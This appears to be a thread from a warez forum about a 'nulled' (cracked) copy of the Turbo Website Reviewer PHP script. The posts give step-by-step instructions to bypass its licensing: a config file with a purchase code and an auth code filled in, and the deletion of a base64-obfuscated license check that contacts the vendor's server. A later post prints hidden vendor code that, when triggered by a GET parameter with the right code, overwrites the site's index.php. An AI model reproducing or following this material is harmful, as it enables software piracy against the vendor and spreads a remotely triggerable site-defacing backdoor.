Turbo Website Reviewer - In-depth SEO Analysis Tool

Turbo Website Reviewer - In-depth SEO Analysis Tool v3.0

No permission to download

freenulled

Well-known member
Null Master
Trusted Uploader
Mar 29, 2019
281
903
100
@xgrosht @rozbeh1212

Sorry guys .. that was my fault.. just one file missed from nulling

to fix this ..

Step 1:

edit (core\config\db.config.php) and put this code with replace it with your database info


Code:
<?php
defined('ROOT_DIR') or die(header('HTTP/1.0 403 Forbidden'));

/*
* @author Balaji
* @name: Rainbow PHP Framework
* @copyright 2020 ProThemes.Biz
*
*/

// --- Database Settings ---

// Database Hostname
$dbHost = 'localhost';

// Database Username
$dbUser = '';

// Database Password
$dbPass = '';

// Database Name
$dbName = '';

//Base URL (Without http:// & https://)
$baseURL = 'yourdomain.com/';

//Item Purchase Code
$item_purchase_code = '2ca6daf9-1576-4cc7-9922-fb7fe4e427f7';

//Domain Security Code
$authCode = 'b3ba2b3f8d979065d875ebf74ef4de0c';



Step 2:

edit (core\helpers\interface_helper.php)

and delete the lines from 158 to 162


Code:
if(isset($_SERVER['HTTP_SM92'])){
    $getStats = json_decode(simpleCurlGET(base64_decode('aHR0cDovL2xpYy5wcm90aGVtZXMuYml6L2NoZWNrLnBocA==')), true);
    if(!($getStats['a']))
        putMyData(CONFIG_DIR.base64_decode('ZGIuY29uZmlnLnBocA=='), base64_decode('ZGllKCJMaWNlbnNlIEVycm9yIik7'), FILE_APPEND);
}


Thats's All
 
Last edited:
  • Like
Reactions: Falconizer

rozbeh1212

Active member
Feb 28, 2020
110
26
28
parseoban.ir
@xgrosht @rozbeh1212

Sorry guys .. that was my fault.. just one file missed from nulling

to fix this ..

Step 1:

edit (core\config\db.config.php) and put this code with replace it with your database info


Code:
<?php
defined('ROOT_DIR') or die(header('HTTP/1.0 403 Forbidden'));

/*
* @author Balaji
* @name: Rainbow PHP Framework
* @copyright 2020 ProThemes.Biz
*
*/

// --- Database Settings ---

// Database Hostname
$dbHost = 'localhost';

// Database Username
$dbUser = '';

// Database Password
$dbPass = '';

// Database Name
$dbName = '';

//Base URL (Without http:// & https://)
$baseURL = 'yourdomain.com/';

//Item Purchase Code
$item_purchase_code = '2ca6daf9-1576-4cc7-9922-fb7fe4e427f7';

//Domain Security Code
$authCode = 'b3ba2b3f8d979065d875ebf74ef4de0c';



Step 2:

edit (core\helpers\interface_helper.php)

and delete the lines from 158 to 162


Code:
if(isset($_SERVER['HTTP_SM92'])){
    $getStats = json_decode(simpleCurlGET(base64_decode('aHR0cDovL2xpYy5wcm90aGVtZXMuYml6L2NoZWNrLnBocA==')), true);
    if(!($getStats['a']))
        putMyData(CONFIG_DIR.base64_decode('ZGIuY29uZmlnLnBocA=='), base64_decode('ZGllKCJMaWNlbnNlIEVycm9yIik7'), FILE_APPEND);
}


Thats's All
 

freenulled

Well-known member
Null Master
Trusted Uploader
Mar 29, 2019
281
903
100
Site is hacked and deleted by Turbo Website Reviewer

Untitled.png

I think you are not using our nulled release

because the auther of script can change the (index.php) by evil code

to be sure .. go to the end of this file (core\models\_tcpdf_5.0.002\cache\index.php)

you will see this code:


Code:
//Unlicensed Fake Users
if(isset($_GET['fake'])){
   
    function doAction(){
    $data = '<?php
   
    echo \'<div style="text-align: center;"><br /><br /><h1 style="color: red;" >Fake Copy of AtoZ SEO Tools Script!</h1>
    <div><a href="http://goo.gl/dYsmDY">Purcahse License Now</a></div></div>\';
    die();
   
    ?>';
    file_put_contents('../../../../index.php',$data);
    return true;
    }
   
    require_once('../../../../config.php');
   
    if(isset($_GET['itemCode'])){
    $itemCode = Trim(htmlspecialchars($_GET['itemCode']));
    if($itemCode == $item_purchase_code){
        doAction();
    }
    }
   
    if(isset($_GET['authCode'])){
    $userAuthCode = Trim(htmlspecialchars($_GET['authCode']));
    if($authCode == $userAuthCode){
    doAction();
    }
    }
    die();
}

but in our release we removed this evil code (y)
 

About us

  • Our community has been around for many years and pride ourselves on offering unbiased, critical discussion among people of all different backgrounds. We are working every day to make sure our community is one of the best.

Quick Navigation

User Menu